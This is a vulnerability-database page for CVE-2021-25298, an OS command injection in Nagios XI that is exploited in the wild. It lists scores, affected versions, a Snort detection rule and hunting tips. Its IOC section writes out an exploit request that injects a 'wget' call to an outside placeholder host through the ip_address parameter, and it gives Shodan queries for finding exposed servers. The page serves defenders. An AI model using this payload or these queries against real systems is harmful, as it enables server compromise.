cbcvebase.
CVE-2021-25298
published 2021-02-15

CVE-2021-25298: Nagios XI version xi-5.7.5 is affected by OS command injection. The vulnerability exists in the file…

PriorityP192high8.8CVSS 3.1
AVNACLPRLUINSUCHIHAH
KEVITWEXPLOIT
CISA Known Exploited Vulnerabilitydue 2022-02-01
Exploited in the wild
EPSS
75.20%
99.4th percentile
Nagios XI version xi-5.7.5 is affected by OS command injection. The vulnerability exists in the file /usr/local/nagiosxi/html/includes/configwizards/cloud-vm/cloud-vm.inc.php due to improper sanitization of authenticated user-controlled input by a single HTTP request, which can lead to OS command injection on the Nagios XI server.

Affected

1 ranges
VendorProductVersion rangeFixed in
nagiosnagios_xi5.5.6 – 5.7.5

Detection & IOCsextracted from sources · hover to see the quote

path/usr/local/nagiosxi/html/includes/configwizards/cloud-vm/cloud-vm.inc.php
url/nagiosxi/config/monitoringwizard.php?update=1&nsp={{nsp_auth}}&nextstep=4&wizard=digitalocean&no_ssl_verify=1&ip_address=127.0.0.1%3b%20wget%20{{interactsh-url}}%3b
path/nagiosxi/config/monitoringwizard.php
commandip_address=127.0.0.1%3b%20wget%20<oast-url>%3b
snort
alert http any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Nagios XI OS Command Injection (CVE-2021-25297 & CVE-2021-25298)"; flow:established,to_server; http.method; content:"GET"; http.uri; content:"nagiosxi/config/monitoringwizard.php?"; fast_pattern; content:"ip_address="; content:"|3b|"; within:30; reference:cve,2021-25296; reference:cve,2021-25297; classtype:attempted-admin; sid:2034993; rev:1; metadata:attack_target Server, created_at 2022_01_27, cve CVE_2021_25296_CVE_2021_25297, deployment Perimeter, deployment Internal, confidence Medium, signature_severity Major, tag Exploit, tag CISA_KEV, updated_at 2022_01_27, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_technique_id T1190, mitre_technique_name Exploit_Public_Facing_Application;)
  • Exploit requests target GET /nagiosxi/config/monitoringwizard.php with parameters wizard=digitalocean (or cloud-vm/switch/windowswmi), nextstep=4, and a semicolon-encoded command injection payload (%3b) in the ip_address parameter.
  • The Emergent Threats Snort rule (sid:2034993) detects the attack by matching GET requests to nagiosxi/config/monitoringwizard.php? containing ip_address= followed by a URL-encoded semicolon (|3b|) within 30 bytes — use this pattern in NIDS/proxy logs.
  • Exploitation requires prior authentication; look for a POST to /nagiosxi/login.php followed shortly by the malicious GET to monitoringwizard.php from the same source IP.
  • The Metasploit module targets Nagios XI versions 5.5.6 to 5.7.5 across three wizards (windowswmi, switch, cloud-vm); version fingerprinting on Nagios XI instances in this range should be prioritised for patching and monitoring.
  • Successful exploitation runs commands as the apache user; monitor for unexpected processes spawned by apache/httpd, especially outbound wget/curl calls.
  • Shodan/FOFA exposure queries can identify internet-facing Nagios XI instances: search for title:"Nagios XI" or http.title:"nagios xi" to enumerate attack surface.
  • ·The Nuclei template uses the 'digitalocean' wizard name in the exploit request, but the vulnerable file is cloud-vm.inc.php; the Metasploit module also covers 'windowswmi' and 'switch' wizards for related CVEs (CVE-2021-25296/25297). Detection rules should account for all three wizard names.
  • ·The Emergent Threats Snort rule (sid:2034993) references CVE-2021-25296 and CVE-2021-25297 in its metadata but the rule body also covers CVE-2021-25298 traffic patterns; ensure your NIDS signature set is updated to rev:1 or later.

CVSS provenance

nvdv3.18.8HIGHCVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
nvdv2.09.0CRITICALAV:N/AC:L/Au:S/C:C/I:C/A:C
vulncheck8.8HIGH
cisa8.8HIGH
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.